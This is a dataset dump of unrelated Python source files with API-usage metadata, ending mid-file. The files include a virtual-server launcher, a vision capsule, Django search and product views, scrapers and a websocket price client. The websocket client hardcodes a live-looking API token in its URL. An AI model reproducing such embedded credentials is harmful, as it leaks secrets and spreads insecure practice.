"os.path.join", "line_number": 126, "usage_type": "call"}, {"api_name": "os.path", "line_number": 126, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 126, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 127, "usage_type": "call"}, {"api_name": "os.path", "line_number": 127, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 127, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 134, "usage_type": "call"}, {"api_name": "os.path", "line_number": 134, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 134, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 135, "usage_type": "call"}, {"api_name": "os.path", "line_number": 135, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 135, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 142, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 142, "usage_type": "attribute"}, {"api_name": "tkinter.Tk", "line_number": 147, "usage_type": "call"}, {"api_name": "tkinter.Text", "line_number": 150, "usage_type": "call"}, {"api_name": "tkinter.BooleanVar", "line_number": 154, "usage_type": "call"}, {"api_name": "tkinter.BooleanVar", "line_number": 155, "usage_type": "call"}, {"api_name": "tkinter.BooleanVar", "line_number": 156, "usage_type": "call"}, {"api_name": "tkinter.BooleanVar", "line_number": 157, "usage_type": "call"}, {"api_name": "tkinter.BooleanVar", "line_number": 158, "usage_type": "call"}, {"api_name": "tkinter.BooleanVar", "line_number": 159, "usage_type": "call"}, {"api_name": "tkinter.BooleanVar", "line_number": 160, "usage_type": "call"}, {"api_name": "tkinter.BooleanVar", "line_number": 161, "usage_type": "call"}, {"api_name": "tkinter.BooleanVar", "line_number": 162, "usage_type": "call"}, {"api_name": "tkinter.BooleanVar", "line_number": 163, "usage_type": "call"}, {"api_name": "tkinter.Checkbutton", "line_number": 165, "usage_type": "call"}, {"api_name": "tkinter.Checkbutton", "line_number": 166, "usage_type": "call"}, {"api_name": "tkinter.Checkbutton", "line_number": 167, "usage_type": "call"}, {"api_name": "tkinter.Checkbutton", "line_number": 168, "usage_type": "call"}, {"api_name": "tkinter.Checkbutton", "line_number": 169, "usage_type": "call"}, {"api_name": "tkinter.Checkbutton", "line_number": 170, "usage_type": "call"}, {"api_name": "tkinter.Checkbutton", "line_number": 171, "usage_type": "call"}, {"api_name": "tkinter.Checkbutton", "line_number": 172, "usage_type": "call"}, {"api_name": "tkinter.Checkbutton", "line_number": 173, "usage_type": "call"}, {"api_name": "tkinter.Checkbutton", "line_number": 174, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 176, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 177, "usage_type": "call"}]} +{"seq_id": "39284188403", "text": "#! /bin/python3\n\nimport argparse\nimport multiprocessing as mp\nimport pathlib\nimport time\nfrom queue import Empty\n\nfrom utils import file, network\nimport console as con\nfrom console import print, getch\nfrom virserver import Server\n\n\ndef parse_args() -> argparse.Namespace:\n parser = argparse.ArgumentParser(\n description=\"Launches multiple virtual servers and display there status after certain interval\"\n )\n parser.add_argument(\n \"-i\",\n \"--interval\",\n help=\"Time interval in seconds between server status reporting in seconds\",\n type=int,\n required=True,\n dest=\"interval\",\n )\n parser.add_argument(\n \"-n\",\n \"--number\",\n help=\"Total number of virtual server\",\n type=int,\n required=True,\n dest=\"number\",\n )\n parser.add_argument(\n \"-f\",\n \"--file\",\n help=\"Path to the file (either absolute or relative)\",\n required=True,\n dest=\"file\",\n )\n parser.add_argument(\n \"-p\",\n \"--port\",\n nargs=\"*\",\n help=\"List of ports that must be equal to number of virtual servers\",\n type=int,\n required=True,\n dest=\"ports\",\n )\n parser.add_argument(\n \"-c\",\n \"--color-printing\",\n help=\"Enables color printing in the console\",\n action=\"store_true\",\n default=False,\n dest=\"colors\",\n )\n return parser.parse_args()\n\n\ndef verify(args: argparse.Namespace):\n con.pretty_printing = args.colors\n try:\n # Verify number of ports equal the number of servers\n print(\"Validating server count ... \", end=\"\")\n assert args.number == len(args.ports)\n con.success(\"OK\")\n print(\"Validating server ports ... \")\n for port in args.ports:\n print(\"\\t{} ... \".format(port), end=\"\")\n assert network.check_sock(network.get_local_ip(), port)\n con.success(\"OK\")\n # Verify a valid file was passed\n print(\"Validating file ... \", end=\"\")\n assert pathlib.Path(args.file).is_file()\n con.success(\"OK\")\n return args\n except AssertionError:\n con.error(\"FAILED\")\n quit(1)\n\n\ndef init(args: argparse.Namespace):\n con.clear()\n con.box_print(\"Project Malcolm\")\n print(\"Local IP Address:\", network.get_local_ip())\n print(\"Public IP Address:\", network.get_public_ip())\n print(\"File size:\", file.get_size(args.file), \"Bytes\")\n print(\"Checksum:\", file.gen_checksum(args.file))\n print()\n print(\"Press any key to start servers\")\n con.getch()\n\n\ndef display_info():\n global procs, queue, status\n while True:\n con.clear()\n try:\n for index, (process_id, process, queue) in enumerate(procs):\n try:\n status[index] = queue.get_nowait()\n except Empty:\n pass\n print('\\r', status[index])\n except KeyboardInterrupt as e:\n for process, queue in procs:\n process.terminate()\n process.join()\n break\n except Exception as e:\n con.error(e)\n else:\n time.sleep(args.interval)\n\n\nif __name__ == \"__main__\":\n args = verify(parse_args())\n init(args)\n\n procs = []\n for process_id, port in enumerate(args.ports, start=1):\n queue: mp.Queue = mp.Queue()\n process = mp.Process(\n target=Server,\n args=(args.file,),\n kwargs={\n \"id\": process_id,\n \"interval\": args.interval,\n \"port\": int(port),\n \"queue\": queue,\n },\n )\n process.start()\n procs.append((process_id, process, queue))\n\n status = [\"Server {}: Status Alive\".format(i) for i, _, _ in procs]\n display = mp.Process(target=display_info)\n display.start()\n while True:\n try:\n x = int(getch())\n for index, (process_id, process, queue) in enumerate(procs):\n if process_id == x:\n _has = True\n queue.put_nowait(\"Server {}: Status DEAD\".format(process_id))\n process.terminate()\n process.join()\n procs.remove(procs[index])\n if len(procs) == 0:\n display.terminate()\n display.join()\n quit()\n except ValueError as e:\n con.error(\"Invalid value provided\\nDescription: {}\".format(e))\n", "repo_name": "UbadahJ/project-malcolm", "sub_path": "src/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 4546, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 16, "usage_type": "call"}, {"api_name": "argparse.Namespace", "line_number": 15, "usage_type": "attribute"}, {"api_name": "argparse.Namespace", "line_number": 62, "usage_type": "attribute"}, {"api_name": "console.pretty_printing", "line_number": 63, "usage_type": "attribute"}, {"api_name": "console.print", "line_number": 66, "usage_type": "call"}, {"api_name": "console.success", "line_number": 68, "usage_type": "call"}, {"api_name": "console.print", "line_number": 69, "usage_type": "call"}, {"api_name": "console.print", "line_number": 71, "usage_type": "call"}, {"api_name": "utils.network.check_sock", "line_number": 72, "usage_type": "call"}, {"api_name": "utils.network", "line_number": 72, "usage_type": "name"}, {"api_name": "utils.network.get_local_ip", "line_number": 72, "usage_type": "call"}, {"api_name": "console.success", "line_number": 73, "usage_type": "call"}, {"api_name": "console.print", "line_number": 75, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 76, "usage_type": "call"}, {"api_name": "console.success", "line_number": 77, "usage_type": "call"}, {"api_name": "console.error", "line_number": 80, "usage_type": "call"}, {"api_name": "argparse.Namespace", "line_number": 84, "usage_type": "attribute"}, {"api_name": "console.clear", "line_number": 85, "usage_type": "call"}, {"api_name": "console.box_print", "line_number": 86, "usage_type": "call"}, {"api_name": "console.print", "line_number": 87, "usage_type": "call"}, {"api_name": "utils.network.get_local_ip", "line_number": 87, "usage_type": "call"}, {"api_name": "utils.network", "line_number": 87, "usage_type": "name"}, {"api_name": "console.print", "line_number": 88, "usage_type": "call"}, {"api_name": "utils.network.get_public_ip", "line_number": 88, "usage_type": "call"}, {"api_name": "utils.network", "line_number": 88, "usage_type": "name"}, {"api_name": "console.print", "line_number": 89, "usage_type": "call"}, {"api_name": "utils.file.get_size", "line_number": 89, "usage_type": "call"}, {"api_name": "utils.file", "line_number": 89, "usage_type": "name"}, {"api_name": "console.print", "line_number": 90, "usage_type": "call"}, {"api_name": "utils.file.gen_checksum", "line_number": 90, "usage_type": "call"}, {"api_name": "utils.file", "line_number": 90, "usage_type": "name"}, {"api_name": "console.print", "line_number": 91, "usage_type": "call"}, {"api_name": "console.print", "line_number": 92, "usage_type": "call"}, {"api_name": "console.getch", "line_number": 93, "usage_type": "call"}, {"api_name": "console.clear", "line_number": 99, "usage_type": "call"}, {"api_name": "queue.get_nowait", "line_number": 103, "usage_type": "call"}, {"api_name": "queue.Empty", "line_number": 104, "usage_type": "name"}, {"api_name": "console.print", "line_number": 106, "usage_type": "call"}, {"api_name": "console.error", "line_number": 113, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 115, "usage_type": "call"}, {"api_name": "multiprocessing.Queue", "line_number": 124, "usage_type": "attribute"}, {"api_name": "multiprocessing.Process", "line_number": 125, "usage_type": "call"}, {"api_name": "virserver.Server", "line_number": 126, "usage_type": "name"}, {"api_name": "multiprocessing.Process", "line_number": 139, "usage_type": "call"}, {"api_name": "console.getch", "line_number": 143, "usage_type": "call"}, {"api_name": "queue.put_nowait", "line_number": 147, "usage_type": "call"}, {"api_name": "console.error", "line_number": 156, "usage_type": "call"}]} +{"seq_id": "21208068976", "text": "from typing import Dict\n\nfrom vcap import BaseBackend, BaseCapsule, DeviceMapper, NodeDescription, \\\n FloatOption, BoolOption, IntOption\n\nfrom .backend import Backend\n\n\nclass Capsule(BaseCapsule):\n name = \"detector_person_example\"\n version = 1\n device_mapper = DeviceMapper.map_to_all_gpus()\n # This capsule takes no input from other capsules\n input_type = NodeDescription(size=NodeDescription.Size.NONE)\n # This capsule produces DetectionNodes of people\n output_type = NodeDescription(\n size=NodeDescription.Size.ALL,\n detections=[\"person\"])\n options = {\n \"detection_threshold\": FloatOption(\n description=\"The confidence threshold for the model. A higher \"\n \"value means fewer detections\",\n default=0.5,\n min_val=0.1,\n max_val=1.0),\n \"scale_frame\": BoolOption(\n description=\"If true, the frame width and height will be clamped \"\n \"to the value of scale_frame_max_side_length, \"\n \"preserving aspect ratio\",\n default=False),\n\n \"scale_frame_max_side_length\": IntOption(\n description=\"The width or height to scale frames down to \"\n \"if scale_frames is True\",\n default=2000,\n min_val=200,\n max_val=4000)\n }\n\n @staticmethod\n def backend_loader(capsule_files: Dict[str, bytes], device: str) \\\n -> BaseBackend:\n\n # Real capsules do not need to do this check. This is only to provide\n # a warning for this example because the model is not included in the\n # repo.\n model_filename = \"ssd_mobilenet_v1_coco.pb\"\n try:\n model_file = capsule_files[model_filename]\n except KeyError as exc:\n message = f\"Model [{model_filename}] not found. Did you make \" \\\n f\"sure to run tests? Example models files are not \" \\\n f\"stored directly in the repo, but are downloaded \" \\\n f\"when tests are run.\"\n raise FileNotFoundError(message) from exc\n\n return Backend(model_bytes=model_file,\n metadata_bytes=capsule_files[\"dataset_metadata.json\"],\n device=device)\n", "repo_name": "opencv/open_vision_capsules", "sub_path": "vcap/examples/detector_person_example/capsule.py", "file_name": "capsule.py", "file_ext": "py", "file_size_in_byte": 2305, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 126, "dataset": "github-code", "pt": "52", "api": [{"api_name": "vcap.BaseCapsule", "line_number": 9, "usage_type": "name"}, {"api_name": "vcap.DeviceMapper.map_to_all_gpus", "line_number": 12, "usage_type": "call"}, {"api_name": "vcap.DeviceMapper", "line_number": 12, "usage_type": "name"}, {"api_name": "vcap.NodeDescription", "line_number": 14, "usage_type": "call"}, {"api_name": "vcap.NodeDescription.Size", "line_number": 14, "usage_type": "attribute"}, {"api_name": "vcap.NodeDescription", "line_number": 16, "usage_type": "call"}, {"api_name": "vcap.NodeDescription.Size", "line_number": 17, "usage_type": "attribute"}, {"api_name": "vcap.NodeDescription", "line_number": 17, "usage_type": "name"}, {"api_name": "vcap.FloatOption", "line_number": 20, "usage_type": "call"}, {"api_name": "vcap.BoolOption", "line_number": 26, "usage_type": "call"}, {"api_name": "vcap.IntOption", "line_number": 32, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 41, "usage_type": "name"}, {"api_name": "backend.Backend", "line_number": 57, "usage_type": "call"}, {"api_name": "vcap.BaseBackend", "line_number": 42, "usage_type": "name"}]} +{"seq_id": "71196900325", "text": "import re\nfrom rest_framework.views import APIView\nfrom .models import Project\nfrom rest_framework.response import Response\nfrom .serializers import ProjectSerializer\nfrom .constants import *\n\n# Return list of projects\nclass ProjectDetailsView(APIView):\n def get(self,request):\n snippets = Project.objects.all()\n serializer = ProjectSerializer(snippets, many=True)\n return Response(serializer.data)\n \n#Return list of filtered projects according to query\nclass FilteredDetailsView(APIView):\n def get(self,request):\n search_query = self.request.GET.get('search', '').split(\" \")\n built_query = []\n\n # filtering query on basis of keywords present in db\n for word in search_query:\n word = re.sub('[\\W_]+', '', word)\n word = word.lower()\n if word:\n if word in skillset:\n built_query.append(word)\n elif word in technologies_used:\n built_query.append(word)\n\n # return queryset according to skill present in db \n if BACKEND in built_query:\n for tech in built_query:\n if tech in backend_skills:\n queryset = Project.objects.filter(technical_skillset__backend__icontains=tech)\n break\n\n elif FRONTEND in built_query:\n for tech in built_query:\n if tech in frontend_skills:\n queryset = Project.objects.filter(technical_skillset__frontend__icontains=tech)\n \n elif DB or DATABASES in built_query:\n for tech in built_query:\n if tech in db_skills:\n queryset = Project.objects.filter(technical_skillset__databases__icontains=tech)\n \n elif INFRASTRUCTURE in built_query:\n for tech in built_query:\n if tech in infra_skills:\n queryset = Project.objects.filter(technical_skillset__infrastructure__icontains=tech)\n \n serializer = ProjectSerializer(queryset, many=True)\n return Response(serializer.data)\n\n\n\n", "repo_name": "akshitajain917/project_gallery", "sub_path": "api/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2107, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rest_framework.views.APIView", "line_number": 9, "usage_type": "name"}, {"api_name": "models.Project.objects.all", "line_number": 11, "usage_type": "call"}, {"api_name": "models.Project.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "models.Project", "line_number": 11, "usage_type": "name"}, {"api_name": "serializers.ProjectSerializer", "line_number": 12, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 13, "usage_type": "call"}, {"api_name": "rest_framework.views.APIView", "line_number": 16, "usage_type": "name"}, {"api_name": "re.sub", "line_number": 23, "usage_type": "call"}, {"api_name": "models.Project.objects.filter", "line_number": 35, "usage_type": "call"}, {"api_name": "models.Project.objects", "line_number": 35, "usage_type": "attribute"}, {"api_name": "models.Project", "line_number": 35, "usage_type": "name"}, {"api_name": "models.Project.objects.filter", "line_number": 41, "usage_type": "call"}, {"api_name": "models.Project.objects", "line_number": 41, "usage_type": "attribute"}, {"api_name": "models.Project", "line_number": 41, "usage_type": "name"}, {"api_name": "models.Project.objects.filter", "line_number": 46, "usage_type": "call"}, {"api_name": "models.Project.objects", "line_number": 46, "usage_type": "attribute"}, {"api_name": "models.Project", "line_number": 46, "usage_type": "name"}, {"api_name": "models.Project.objects.filter", "line_number": 51, "usage_type": "call"}, {"api_name": "models.Project.objects", "line_number": 51, "usage_type": "attribute"}, {"api_name": "models.Project", "line_number": 51, "usage_type": "name"}, {"api_name": "serializers.ProjectSerializer", "line_number": 53, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 54, "usage_type": "call"}]} +{"seq_id": "70228630565", "text": "import sqlite3\nfrom dataclasses import dataclass\nfrom enum import Enum\nfrom typing import Generator, Iterable\n\nfrom rdt_search.value_objects import Time\n\nINDEX_NAME = \"radiot_search\"\n\n\nclass LastEpisode:\n def __init__(self, db: sqlite3.Cursor):\n self._db = db\n\n def execute(self) -> int:\n return self._db.execute(f\"SELECT MAX(episode_number) FROM {INDEX_NAME}\").fetchone()[0]\n\n\nclass SyntaxError(Exception):\n def __init__(self, message):\n self.message = message\n super().__init__(message)\n\n @classmethod\n def from_operational_error(cls, error: str):\n message = error.replace(\"fts5:\", \"\").strip()\n return cls(message)\n\n\nclass Search:\n @dataclass\n class SearchResult:\n episode_number: int\n start_time: Time\n end_time: Time\n text: str\n link: str\n\n class OrderBy(str, Enum):\n RANK_ASC = \"rank_asc\"\n RANK_DESC = \"rank_desc\"\n EPISODE_NUMBER_ASC = \"episode_number_asc\"\n EPISODE_NUMBER_DESC = \"episode_number_desc\"\n\n def to_sql(self):\n col, order = self.value.rsplit(\"_\", maxsplit=1)\n return f\"{col} {order.upper()}\"\n\n def __init__(self, db: sqlite3.Cursor):\n self._db = db\n\n def execute(\n self, q: str, episode_number: int | None, order_by: OrderBy, limit: int = 100\n ) -> list[SearchResult]:\n episode_condition = \"\"\n if episode_number is not None:\n episode_condition = f\" AND episode_number = {int(episode_number)}\"\n\n query = (\n f\"SELECT text, episode_number, start_time, end_time FROM {INDEX_NAME} WHERE text MATCH\"\n f\" ?{episode_condition} ORDER BY {order_by.to_sql()}, start_time LIMIT ?\"\n )\n params = (q, limit)\n return list(self._parsed_rows(self._execute(query, params)))\n\n def _execute(self, query: str, params: tuple):\n try:\n return self._db.execute(query, params).fetchall()\n except sqlite3.OperationalError as e:\n if \"syntax error\" in e.args[0]:\n raise SyntaxError.from_operational_error(e.args[0])\n raise\n\n def _parsed_rows(self, rows: Iterable[tuple]) -> Generator[SearchResult, None, None]:\n for row in rows:\n text, ep, start, end = row\n yield self.SearchResult(\n episode_number=ep,\n start_time=Time(start),\n end_time=Time(end),\n text=text,\n link=link_to_fragment_start(episode_number=ep, seconds=Time(start).seconds),\n )\n\n\ndef link_to_fragment_start(episode_number: int, seconds: int) -> str:\n return f\"https://cdn.radio-t.com/rt_podcast{episode_number}.mp3#t={seconds}\"\n", "repo_name": "yakimka/rdt_search", "sub_path": "rdt_search/queries.py", "file_name": "queries.py", "file_ext": "py", "file_size_in_byte": 2721, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sqlite3.Cursor", "line_number": 12, "usage_type": "attribute"}, {"api_name": "rdt_search.value_objects.Time", "line_number": 34, "usage_type": "name"}, {"api_name": "rdt_search.value_objects.Time", "line_number": 35, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 31, "usage_type": "name"}, {"api_name": "enum.Enum", "line_number": 39, "usage_type": "name"}, {"api_name": "sqlite3.Cursor", "line_number": 49, "usage_type": "attribute"}, {"api_name": "sqlite3.OperationalError", "line_number": 69, "usage_type": "attribute"}, {"api_name": "typing.Iterable", "line_number": 74, "usage_type": "name"}, {"api_name": "rdt_search.value_objects.Time", "line_number": 79, "usage_type": "call"}, {"api_name": "rdt_search.value_objects.Time", "line_number": 80, "usage_type": "call"}, {"api_name": "rdt_search.value_objects.Time", "line_number": 82, "usage_type": "call"}, {"api_name": "typing.Generator", "line_number": 74, "usage_type": "name"}]} +{"seq_id": "6052380329", "text": "#!/usr/bin/env python\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom ScraperBase import ScraperBase\nfrom Common import Status, SaveHtmlToTable\nimport logging\nfrom typing import Tuple, List\nfrom prepmod import prepmod\nimport re\n\nclass EvergreenstatePrepmod(ScraperBase):\n\n def __init__(self):\n self.URL = \"https://snohomish-county-coronavirus-response-snoco-gis.hub.arcgis.com/pages/covid-19-vaccine\"\n self.LocationName = \"EvergreenState\"\n self.Keys = [\"evergreen_state_prep\"]\n\n @SaveHtmlToTable\n def MakeGetRequest(self) -> Tuple[List[str], Status, str]:\n #Make outbound GET to the URL in question\n r = requests.get(self.URL)\n\n #Parse the HTML\n soup = BeautifulSoup(r.content, 'html.parser')\n\n prepmod_links = [] # list of prepmod links on main website\n #finds monreos prepmod link only\n for place in soup.find_all('ul'):\n if \"Monroe\" in place.text:\n for link in place.find_all('a', attrs={'href': re.compile(\"^https://prepmod\")}):\n prepmod_links.append(link.get('href'))\n\n #create prepmod object\n prep = prepmod(prepmod_links)\n #gets combined status of links\n case = prep.getcase()\n\n if case == Status.POSSIBLE:\n # Failure case not met, leave as possible\n # HTML will be auto uploaded by wrapper function\n logging.info(self.LocationName + \" site has changed, recheck\")\n\n\n return self.Keys, case, r.text\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.DEBUG)\n scraper = EvergreenstatePrepmod()\n keys, case, text = scraper.MakeGetRequest()\n logging.debug(f\"keys={keys} case={case}\")\n", "repo_name": "CovidWA/scrapers-oss", "sub_path": "python/EvergreenstatePrepmod.py", "file_name": "EvergreenstatePrepmod.py", "file_ext": "py", "file_size_in_byte": 1716, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "ScraperBase.ScraperBase", "line_number": 12, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 22, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 25, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 31, "usage_type": "call"}, {"api_name": "prepmod.prepmod", "line_number": 35, "usage_type": "call"}, {"api_name": "Common.Status.POSSIBLE", "line_number": 39, "usage_type": "attribute"}, {"api_name": "Common.Status", "line_number": 39, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 42, "usage_type": "call"}, {"api_name": "Common.SaveHtmlToTable", "line_number": 19, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "name"}, {"api_name": "Common.Status", "line_number": 20, "usage_type": "name"}, {"api_name": "logging.basicConfig", "line_number": 48, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 48, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "27815548254", "text": "#https://pypi.org/project/websocket_client/\nimport websocket\nimport pprint\nimport json\nptp = pprint.PrettyPrinter(width= 50, compact= True)\n\ndef on_message(ws, message):\n js = json.loads(message)\n if js['type'] != 'ping':\n print(\"\\n cool\")\n print(js['data'][0]['p'])\n\ndef on_error(ws, error):\n print(error)\n\ndef on_close(ws):\n print(\"### closed ###\")\n\ndef on_open(ws):\n ws.send('{\"type\":\"subscribe\",\"symbol\":\"BINANCE:DOGEUSDT\"}')\n\nif __name__ == \"__main__\":\n websocket.enableTrace(True) \n ws = websocket.WebSocketApp(\"wss://ws.finnhub.io?token=c2i0532ad3idsa35ckk0\",\n on_message = on_message,\n on_error = on_error,\n on_close = on_close)\n ws.on_open = on_open\n ws.run_forever()", "repo_name": "coolxm/Dogecoin", "sub_path": "Price.py", "file_name": "Price.py", "file_ext": "py", "file_size_in_byte": 804, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pprint.PrettyPrinter", "line_number": 5, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 8, "usage_type": "call"}, {"api_name": "websocket.enableTrace", "line_number": 23, "usage_type": "call"}, {"api_name": "websocket.WebSocketApp", "line_number": 24, "usage_type": "call"}]} +{"seq_id": "14465976629", "text": "import sqlite3\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef scrape_books():\n response = requests.get(\"http://books.toscrape.com/catalogue/category/books/classics_6/index.html\")\n soup = BeautifulSoup(response.text, \"html.parser\")\n books = soup.find_all(\"article\")\n\n books_list = []\n for book in books:\n books_list.append((get_title(book), get_price(book), get_rating(book)))\n save_books(books_list)\n\n\ndef get_title(book):\n return book.find(\"h3\").find(\"a\")[\"title\"]\n\n\ndef get_price(book):\n price = book.find(class_=\"price_color\").get_text()\n return float(price.replace(\"£\", \"\").replace(\"Â\", \"\"))\n\n\ndef get_rating(book):\n ratings = {\"Zero\": 0, \"One\": 1, \"Two\": 2, \"Three\": 3, \"Four\": 4, \"Five\": 5}\n paragraph = book.find(class_=\"star-rating\")\n rating_text = paragraph.get_attribute_list(\"class\")[-1]\n return ratings[rating_text]\n\n\ndef save_books(all_books):\n connection = sqlite3.connect(\"books.db\")\n c = connection.cursor()\n c.execute(\"CREATE TABLE books (title TEXT, price REAL, rating INTEGER)\")\n c.executemany(\"INSERT INTO books VALUES (?,?,?)\", all_books)\n connection.commit()\n connection.close()\n\n\nscrape_books()\n", "repo_name": "OktarianTB/Python-Projects", "sub_path": "Mini-Projects/book_scraper.py", "file_name": "book_scraper.py", "file_ext": "py", "file_size_in_byte": 1189, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 7, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 8, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "31570061954", "text": "# %%\n# Project for testing geoutils on paleo data.\nimport xarray as xr\nimport numpy as np\nimport geoutils.geodata.base_dataset as bds\nimport geoutils.plotting.plots as gplt\nimport geoutils.utils.time_utils as tu\nfrom importlib import reload\n\n# %%\n# Read files\nreload(bds)\ndata_folder = '/home/strnad/data/era5/'\norograph_file = f'{data_folder}/orography_2019.nc'\n\ngrid_step = None\nds_era5_orography = bds.BaseDataset(data_nc=orograph_file,\n var_name=None,\n grid_step=grid_step,\n decode_times=False,\n )\nds_era5_orography.average_time()\n# %%\n# %%\nreload(gplt)\nmean_t = ds_era5_orography.get_da()/9.81\nim_comp = gplt.plot_map(dmap=mean_t,\n plot_type='contourf',\n cmap='cividis',\n levels=12,\n vmin=0,\n # vmax=310,\n title=f\"Global Orography ERA5 \",\n label=f'Elevation [m]',\n orientation='horizontal',\n tick_step=3,\n # round_dec=2,\n set_map=False,\n sci=3,\n )\n\n# %%\nsavepath = f'{data_folder}/orography_era5.nc'\nds_era5_orography.save(filepath=savepath)", "repo_name": "fstrnad/geoutils", "sub_path": "geoutils/geodata/orography.py", "file_name": "orography.py", "file_ext": "py", "file_size_in_byte": 1385, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "importlib.reload", "line_number": 12, "usage_type": "call"}, {"api_name": "geoutils.geodata.base_dataset", "line_number": 12, "usage_type": "argument"}, {"api_name": "geoutils.geodata.base_dataset.BaseDataset", "line_number": 17, "usage_type": "call"}, {"api_name": "geoutils.geodata.base_dataset", "line_number": 17, "usage_type": "name"}, {"api_name": "importlib.reload", "line_number": 25, "usage_type": "call"}, {"api_name": "geoutils.plotting.plots", "line_number": 25, "usage_type": "argument"}, {"api_name": "geoutils.plotting.plots.plot_map", "line_number": 27, "usage_type": "call"}, {"api_name": "geoutils.plotting.plots", "line_number": 27, "usage_type": "name"}]} +{"seq_id": "33033949023", "text": "import random\nfrom datetime import date\n\nfrom django.db.models import Q\nfrom django.http import JsonResponse\nfrom django.views import View\n\nfrom .models import Category, SubCategory, Product, DiscountRate, DailySpecialDiscount\n\n\n# 이 상품 어때요?\nclass RecommendView(View):\n def get(self, request):\n try:\n categories = Category.objects.all()\n random_categories = random.sample(list(categories), 8)\n\n random_sub_category_list = [random.choice(category.subcategory_set.all()) for category in random_categories]\n random_product_list = [random.choice(sub_category.product_set.all()) for sub_category in random_sub_category_list]\n\n listgoods = [\n {\n \"product_id\" : product.id,\n \"image_url\" : product.image_url, \n \"name\" : product.name, \n \"price\" : product.price,\n \"discount_rate\": product.discountrate_set.get(product_id=product.id).discount_rate \n if DiscountRate.objects.filter(product=product).exists() \n else None\n }\n for product in random_product_list]\n\n return JsonResponse({\"listgoods\": listgoods}, status=200)\n\n except ValueError:\n return JsonResponse({\"message\": \"ValueError\"}, status=500)\n\n except IndexError:\n return JsonResponse({\"message\": \"IndexError\"}, status=500)\n \n\n#카테고리별 모든 상품들 \nclass ProductView(View):\n def get(self, request):\n category_id = request.GET.get('category')\n sub_category_id = request.GET.get('sub-category')\n sort = request.GET.get('sort')\n page = int(request.GET.get('page', 1))\n\n PAGE_LIMIT = 30\n\n sort_keyword = {\n \"new\" : \"-uploaded_at\",\n \"best\": \"-stock\"\n } \n\n # 카테고리 리스트 표출\n if category_id or sub_category_id:\n products = Product.objects.filter(Q(sub_category__category_id=category_id)|Q(sub_category_id=sub_category_id))[(page-1)*PAGE_LIMIT:page*PAGE_LIMIT]\n else:\n products = Product.objects.all().order_by(sort_keyword[sort])[(page-1)*PAGE_LIMIT:page*PAGE_LIMIT]\n \n product_list = [ \n {\n \"product_id\" : product.id,\n \"name\" : product.name,\n \"image_url\" : product.image_url,\n \"price\" : product.price,\n \"discount_rate\": product.discountrate_set.get(product=product).discount_rate \n if DiscountRate.objects.filter(product=product).exists() else None\n } for product in products\n ]\n\n return JsonResponse({\"product_list\": product_list}, status=200)\n\n\nclass CategoryView(View):\n def get(self, request):\n categories = Category.objects.all()\n\n result = [\n {\n 'id': category.id,\n 'category' : category.name,\n 'subcategories': [\n {\n \"sub_category_id\": sub_category.id,\n \"sub_category_name\": sub_category.name\n } for sub_category in SubCategory.objects.filter(category=category)\n ]\n } for category in categories ]\n \n return JsonResponse({'result': result}, status=200)\n\n\nclass DailySpecialProductView(View):\n def get(self, request):\n start_date = date.today()\n daily_products = DailySpecialDiscount.objects.filter(start_date=start_date)\n\n dailyspecial = [ {\n 'product_id':daily_product.product.id,\n 'name':daily_product.product.name,\n 'image_url':daily_product.product.image_url,\n 'price':daily_product.product.price,\n 'daily_discount_rate': daily_product.daily_discount_rate,\n 'start_date':start_date\n } for daily_product in daily_products\n ]\n \n return JsonResponse({'dailyspecial': dailyspecial}, status=200)\n\n\n# MD 추천 \nclass MDRecommendView(View):\n def get(self, request):\n limit = request.GET.get('limit', 6)\n offset = request.GET.get('offset', 6)\n category_id = int(offset)/int(limit)\n\n category = 